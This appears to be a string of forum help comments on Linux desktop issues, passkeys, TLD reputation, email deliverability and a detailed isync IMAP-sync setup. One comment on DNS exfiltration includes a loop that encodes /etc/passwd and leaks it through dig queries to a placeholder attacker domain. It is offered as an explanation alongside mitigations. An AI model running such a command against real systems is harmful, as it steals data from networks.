The Arch wiki may have some ideas for you - tl;dr is that GDM uses a global `dconf` db over in /etc/, and this might be the root of your problem (these configs might not get cleaned up with a --purge?). I’m a LightDM user, so this is the best I can do to help: https://wiki.archlinux.org/title/GDM#dconf_configuration
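If you want to poke at that theory by hand, a minimal sketch (paths per the Arch wiki page above; the keyfile name is a placeholder):

```bash
# See whether a GDM dconf profile/db survived the purge
ls -l /etc/dconf/profile/gdm /etc/dconf/db/gdm.d/ 2>/dev/null
# If stale keyfiles remain, remove them and rebuild the system db:
#   sudo rm /etc/dconf/db/gdm.d/SOME-STALE-FILE && sudo dconf update
```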
To try and boil down the complex answers: if you are basically familiar with PGP or SSH keys, the concept of a Passkey is sort of in the same ballpark. But instead of using the same SSH keypair (one `ssh-keygen ...` run) more than once, Passkeys create a new keypair for every use (website) and possibly every device (e.g. 2 phones using 1 website may create 2 sets of keypairs, one on each device) - and additionally embed the username (making it “one-click login”). The client private key is hopefully stored in a secure part of the phone/laptop (an “enclave” or TPM hardware module), which locks it to that device; using a portable password manager such as Bitwarden instead is attractive since the private keys are stored in BW’s data (so they can be synced across devices, backed up, etc.)
They use the phrase “replay” a lot to mean that sending the same password to a website is vulnerable to it being intercepted and reused n+1 times by an attacker; in the keypair model this doesn’t happen, because each “challenge” is a unique crypto math puzzle generated dynamically on every use - like TOTP/2FA but “better”, because there’s no static seed involved (TOTP/2FA clients save a constant seed, which is less robust cryptographically).
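A toy sketch of that challenge/response model using plain openssl (illustrative only - real passkeys speak WebAuthn/CTAP between browser and authenticator, and every filename here is made up):

```bash
# Registration (once per site): client makes a keypair, server stores the public half
openssl genpkey -algorithm ed25519 -out site_priv.pem
openssl pkey -in site_priv.pem -pubout -out site_pub.pem

# Login (every time): server sends 32 fresh random bytes as the challenge...
openssl rand -out challenge.bin 32
# ...client signs them with the private key that never leaves the device...
openssl pkeyutl -sign -inkey site_priv.pem -rawin -in challenge.bin -out sig.bin
# ...server verifies against the stored public key; replaying an old
# signature fails because the next challenge is different random bytes
openssl pkeyutl -verify -pubin -inkey site_pub.pem -rawin -in challenge.bin -sigfile sig.bin
```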
There’s an MV3 alternative (same dev!), “uBlock Origin Lite”, which this article completely fails to mention: https://chromewebstore.google.com/detail/ublock-origin-lite/ddkjiahejlhfcafbddmgiahcphecmpfh
There are certain websites and tools which need Chrome/Chromium, making it a necessary evil; for example, there’s a new trend in firmware flashing of devices like ESP32 boards and ham/GMRS radios where the flashers are web based and use Chrome tech. This new MV3 fork isn’t as good as the original, but it’s better than nothing and does stop some ad trash.
The other data shows that posts and comments are going up linearly (a little suspicious, but OK), but I wonder how the modlog affects the data (meaning how it is captured, and when). I made one comment on an honest post yesterday (hosted on a remote instance), and then the post was deleted by admins, like so:
> Removed Post: “Any app for call recording ?” reason: Rule 2: Please use !askandroid@lemdro.id for support questions.
So my comment shows in my history but cannot actually be accessed; was this comment counted? Was that post counted? Was I counted as an active user yesterday if that was the only activity I did all day? Was the one person who upvoted my comment before the thread was deleted counted?
Lies, damn lies and statistics. :)
tl;dr - depends not only on the device but also on carrier and region. Google specifically made changes to stop devs from doing it. Full explanation here: https://www.pcmag.com/how-to/record-calls-on-your-android-phone
As a sort of historical side comment regarding your concern about misinformation - “how much does it cost to register one?” has been the litmus test for a long time (I’m of an age). More specific to .info, it was one of the very first “new” TLDs introduced in 2002/2003, and the owners basically gave away millions of domains for free to gain market share.[1] This led to a lot of scammers, hackers, malware and whatnot infesting the entire .info TLD, and it was in enough trouble that the whole thing was being blocked outright even around 2012, almost 10 years after introduction.[2] It was also troubled with new “crackdowns” (enforcement rules) due to its overwhelming use for nefarious purposes.[3]
Anecdotal data from my own employment experience: in 2024 it’s still 100% blocked (like ref [2]) by corporate firewalls that enforce strict rules, along with many other TLDs that had the same troubled history (.xyz to name one) and the whole list of “free” domains. However, .info now generally costs $20 USD/yr (with many places offering a first-year discount of less than $5 USD), so I think it’s trying to turn itself around.
Point being, “unrestricted” TLDs which are super cheap have had the historical tendency to attract scammers, phishers, malware and other nefarious entities, because it keeps their cost of doing business at scale low (these guys register hundreds of domains to churn through for short periods of time - “keep moving, don’t get caught”, so to speak). Having lived through this whole saga, I open all TLDs I know to be cheap/free in private/incognito tabs and treat them with suspicion at first.
Most of them (besides weechat-android and quasseldroid, which use bouncers/relays) seem to have fallen out of maintenance; Goguma appears to be currently maintained and updated as a pure standalone client and would be what I’d recommend trying first.
I have successfully sent back a PS5 controller (the original from the box) within the 1-yr warranty; they sent me a brand new controller. You mention “every quarter” - those controllers should still be under warranty. Here is the US-based link to get started: https://repairs.playstation.com/s/request-repair?id=2&locale=en-us&language=en_US
At the quantity the OP might use, buying by the gallon might make more sense - having a look at Amazon, the popular concentrations in gallon+ sizes are 70% and 99.9% (about the same price, ~$25 USD/gal). It probably makes more logistical sense to go with 70% here to reduce evaporation and increase usable liquid on these tall, thin objects (let’s say “sloppy use” of oddly shaped, hard-to-handle glass).
I’ll leave my update at 70% concentration as the more economical choice - I’d presume, based on their comment, that a soak in ZAP ($18 USD/gal) first is needed, followed by the iso method… so it’s a little expensive no matter what for something they might not care about that much.
There are ways to clean glass passively; it sounds like your residue is organic.
Hope this helps. (edit: acetate -> acetone, oops) (edit2: 90% -> 70% alcohol per comment)
This is unfortunately a choice the Nautilus (GNOME) folks have made; in other file managers (Thunar for XFCE, Caja for MATE, etc.) custom actions are a first-class citizen. Within Nautilus, the `nautilus-actions` project was superseded by the `filemanager-actions` project, which was then archived: https://gitlab.gnome.org/Archive/filemanager-actions - a custom GNOME action might be something like `gio launch /path/to/terminal.desktop %d` (where %d is the directory from Nautilus; note it’s `gio launch`, not `gio open`, that actually starts a .desktop file).
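If you want to sanity-check that command shape from a shell first (paths are examples; whether the directory argument is honored depends on the Exec line in that .desktop file):

```bash
# Launch a terminal’s .desktop entry, handing it a directory the way a
# file-manager action would (example paths; adjust to your system)
gio launch /usr/share/applications/org.gnome.Terminal.desktop "$HOME/Projects"
```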
There are 3rd party attempts to recreate what was stripped out of/abandoned in Nautilus such as this one: https://github.com/bassmanitram/actions-for-nautilus
Went down the rabbit hole for you while drinking some tea and listening to the rain - it looks like in the future there is a new app/proposal for FreeDesktop to use `xdg-terminal-exec` as the new/default way, and it’s hard coded into the GNOME “gio” code over here (ctrl+f search xdg-terminal-exec): https://gitlab.gnome.org/GNOME/glib/-/blob/main/gio/gdesktopappinfo.c
That said, it looks like the nautilus-open-terminal Nautilus extension is shipped as part of `gnome-terminal`, so it’s hard coded to run that terminal without using the above code. Instead, you’d need to leverage a different extension called `nautilus-open-any-terminal` for now, until the landscape changes: https://github.com/Stunkymonkey/nautilus-open-any-terminal
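For what it’s worth, setup for that extension looked roughly like this when I skimmed its README - the package and schema names here are from memory, so treat them as assumptions and double-check against the repo:

```bash
# Install the extension (your distro may package it; PyPI name per the README)
pip install --user nautilus-open-any-terminal
# Restart Nautilus so the extension loads
nautilus -q
# Point it at your preferred terminal (gsettings schema per the README)
gsettings set com.github.stunkymonkey.nautilus-open-any-terminal terminal alacritty
```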
(disclaimer: not using GNOME/Nautilus or Fedora, theorycraft from me)
In addition to the other comments which more directly address your question: DNS has been / can be used to exfiltrate data from “secure” networks. Search “dns data exfiltration” in your favourite search engine and you’ll get several high-quality articles. Typical mitigations might be to limit which DNS servers your network can contact, restrict packet sizes to the bare minimum that valid use would need, and so forth.
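A toy sketch of the idea - anything can be smuggled out as ordinary-looking lookups against an attacker-controlled zone (evil.example is a placeholder), which is why the mitigations focus on who you can ask and how much you can say per query:

```bash
# Encode a file DNS-safely, then leak it ~60 chars at a time as query labels
secret=$(base32 -w0 /etc/passwd | tr -d '=')
for chunk in $(echo "$secret" | fold -w 60); do
  dig +short "${chunk}.exfil.evil.example" >/dev/null
done
# Whoever runs evil.example’s authoritative nameserver logs and reassembles the chunks
```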
I’m familiar with the news about the brick - in the past I’ve had this problem (I think it was a bricked… Pixel 2?) and faced similar power-off issues. Keep trying what you’re trying, but in various ways - I vaguely recall that I had to press volume up first and then hold power, or something like that (meaning pressing them both at once, or power first, didn’t work). One of the various combos you’re trying is supposed to be the one that forces it off after ~30 secs of holding, but a fuzzy memory reminds me it was real finicky to actually get working. Worst case scenario, just let the battery die. :(
To your multiple-IMAP concept: I have been using isync / mbsync (name change; the package is `isync` in Debian) for years, running via a cron script to pull email from one domain at one provider and push it to a subfolder of another domain at another provider. You have to be aware of one specific gotcha, but it’s otherwise been working all by itself forever without issues: take note of `PipeLineDepth 1` for IMAP service providers which throttle your speed - I have to use it on the destination-side provider config.
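For reference, that’s just one line in the account block of `~/.mbsyncrc` (hostnames/usernames here are placeholders):

```
IMAPAccount imap-dest-account
Host imap.host2.com
User user2
# serialize IMAP commands; some providers throttle or drop pipelined sessions
PipeLineDepth 1
```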
A few tips, having worked in the corporate world (strict controls):
Create a basic non-spam web page for it that doesn’t look like SEO garbage or whatever. Nothing more than “hey, this is the personal domain of the flatbield family” is fine; maybe add a link to something (links enhance rep - put a picture of your dog up or link to a Wikipedia article or something) and let it rest for at least 30 days. The 3rd-party filtering services used by corporate players severely limit, block or distrust a domain newer than 30 days (or longer, depending). Set up an SSL cert on it for another +1 to its rep value - HTTPS is looked at by these services - and ensure the CAA record for that SSL issuer is in your DNS.
Ensure you use the providers’ setup for DKIM, SPF and so forth (many, like Fastmail, have a DNS-check wizard to get you all set up), as many modern providers will instantly downvote you if anything is missing or wrong with these controls (Gmail and O365 particularly, I’ve heard). In 2024 these are a must-have, not a nice-to-have, for getting your email received by anyone and everyone.
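A quick way to self-check what those wizards set up, using dig (example.com and the selector name are placeholders - your provider tells you the real selector):

```bash
dig +short TXT example.com | grep -i spf1          # SPF record present?
dig +short TXT _dmarc.example.com                  # DMARC policy published?
dig +short CNAME selector1._domainkey.example.com  # DKIM selector resolves?
```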
If you chose a domain at a TLD which has/had been used by the bad guys (dot-xyz, info, zip, etc.) you may wish to reconsider - there are TLDs which are wholesale blocked or rep-downvoted on this basis (by the same services used above). Ensure someone working at a bank (strict egress controls for their employees) can visit your domain, as a good litmus test of its validity for use in email reputation.
A company such as Fastmail spends a lot of time ensuring their IP address space for sending and receiving mail is clean - getting spammers off their service, getting IP rep cleaned off blacklists and so forth. So your task is to focus on the same thing for your domain - if someone previously owned the name, they could have gotten it onto blacklists long ago. A handy way to check old history is looking it up at web.archive.org for captured snapshots (I’ve walked away from domain names because of this, once I discovered previous content I didn’t like).
Fastmail has one feature many others lack (which is hard to research unless you want/need it and have to go down the rabbit hole) - scope-limited login tokens for specific uses. Specifically, you can set up one for “read only IMAP” (to archive emails using scripts, etc.), “SMTP only” (to send emails from scripts, like backup reports), and so forth. Many, if not most, other providers either don’t have this or, if they do, it’s very limited - like one token only with no scope control. $0.02 hth
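As a sketch of what an “SMTP only” token buys you - a backup job can mail its report with nothing but curl (smtp.fastmail.com:465 is their documented endpoint; the addresses and token are placeholders):

```bash
curl --ssl-reqd --url "smtps://smtp.fastmail.com:465" \
  --mail-from "reports@example.com" \
  --mail-rcpt "me@example.com" \
  --user "me@example.com:APP_TOKEN_HERE" \
  --upload-file report.eml   # a pre-built RFC 822 message
```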
This appears to be dark pattern marketing at play; they run a Mastodon instance which intercepts all links to the federated content and pushes you towards their for-profit site. It was actually not doing this earlier - when I visited a few links I inconsistently got real Mastodon content pages.
Generally, if you visit anything like https://flipboard.social/@AlaskaBeacon@flipboard.com it redirects you to flipboard.com/@AlaskaBeacon, which is entirely their for-profit presence. But then it doesn’t, a few tries later after testing more - within a minute I watched the Texas BBQ one allow me to see the profile on flipboard.social, then I reloaded and was suddenly redirected to their flipboard.com/TexasBBQ site.
It seems you might be able to load them into your own Mastodon instance manually and it will work (I do see a profile page with legacy posts which hadn’t federated yet, so “no posts” this early in the test). Something like https://myserver.social/@AlaskaBeacon@flipboard.com will presumably work; I suspect, though, that all posts will be stubs that drive you towards flipboard.com to read the actual content, rather than a direct source (time will tell).
edit: s/is/appears to be/ to give benefit of the doubt
If you have access to some sort of basic Linux system (cloud server, local server, whatever works for you) you can run a program on a timer such as https://isync.sourceforge.io/ (Debian package: `isync`) which reads email from one source and clones it to another. Be careful and run it in a security context that meets your needs (I use a local laptop w/ encryption at home that runs headless 24/7, think Raspberry Pi mode). This includes IMAP (1) -> IMAP (2) as well as IMAP -> local and so on; as with any app you’ll need to spend a bit of time learning how to build the optimum config file for your needs, but once you get it going it’s truly a “set and forget” little widget. Use an on-fail service like https://healthchecks.io in your wrapper script to get notified on error, then go about your life.
Edit: @mike_wooskey@lemmy.thewooskeys.com glanced at your comments and see you have a lot of self-hosting chops, here’s a markdown doc of mine to use isync to clone one IMAP provider (domain1.com) to another IMAP provider (domain2.com) subfolder for archiving. (using a subfolder allows you to go both ways and use both domains normally)
----
Sync email via IMAP from host1/domain1 to a subfolder on host2/domain2 via a cron/timer. Can be reversed as well; just update `Patterns` to exclude the subfolders from being cross-replicated (looped).

Install the `isync` package:

```
apt-get update && apt-get install isync
```
- Passwords for IMAP must be left on disk in plain text; keep `${HOME}/.secure` contents on an encrypted volume unlocked manually.
- The `mbsync` program keeps its transient index files in `${HOME}/.mbsync/`, one per IMAP folder; these are used to keep track of what it has already synced. Should something break, it may be necessary to delete one of these files to force a resync.
- By design, `mbsync` will not delete a destination folder if it’s not empty first; this means if you delete a folder and all its emails on the source in one step, a sync will break with an error/warning. Instead, delete all emails in the folder first, sync those deletions, then delete the empty folder on the source and sync again. See: https://sourceforge.net/p/isync/mailman/isync-devel/thread/f278216b-f1db-32be-fef2-ccaeea912524%40ojkastl.de/#msg37237271

Simple crontab to run the script (hourly shown; adjust the schedule to taste):

```
0 * * * * ${HOME}/bin/hasync.sh
```
Main config for the `mbsync` program: `${HOME}/.mbsyncrc`

```
# Source
IMAPAccount imap-src-account
Host imap.host1.com
Port 993
User user1
PassCmd "cat /home/USER/.secure/psrc"
SSLType IMAPS
SystemCertificates yes
PipeLineDepth 1
#CertificateFile /etc/ssl/certs/ca-certificates.crt

# Dest
IMAPAccount imap-dest-account
Host imap.host2.com
Port 993
User user2
PassCmd "cat /home/USER/.secure/pdst"
SSLType IMAPS
SystemCertificates yes
PipeLineDepth 1
#CertificateFile /etc/ssl/certs/ca-certificates.crt

# Source map
IMAPStore imap-src
Account imap-src-account

# Dest map
IMAPStore imap-dest
Account imap-dest-account

# Transfer options
Channel hasync
Far :imap-src:
Near :imap-dest:HASync/
Sync Pull
Create Near
Remove Near
Expunge Near
Patterns *
CopyArrivalDate yes
```
This script leverages healthchecks.io to alert on failure; replace XXXXX with the UUID of your monitor URL.

`${HOME}/bin/hasync.sh`

```bash
#!/bin/bash

# vars
LOGDIR="${HOME}/log"
TIMESTAMP=$(date +%Y-%m-%d_%H%M)
LOGFILE="${LOGDIR}/mbsync_${TIMESTAMP}.log"
HCPING="https://hc-ping.com/XXXXXXXXXXXXXXXXXXXXXXXXX"

# preflight
if [[ ! -d "${LOGDIR}" ]]; then
  mkdir -p "${LOGDIR}"
fi

# sync
echo -e "\nBEGIN $(date +%Y-%m-%d_%H%M)\n" >> "${LOGFILE}"
/usr/bin/mbsync -c "${HOME}/.mbsyncrc" -V hasync 1>>"${LOGFILE}" 2>&1
EC=$?
echo -e "\nEC: ${EC}" >> "${LOGFILE}"
echo -e "\nEND $(date +%Y-%m-%d_%H%M)\n" >> "${LOGFILE}"

# report: ping healthchecks.io only on success, and prune logs older than 30 days
if [[ $EC -eq 0 ]]; then
  curl -fsS -m 10 --retry 5 -o /dev/null "${HCPING}"
  find "${LOGDIR}" -type f -mtime +30 -delete
fi

exit $EC
```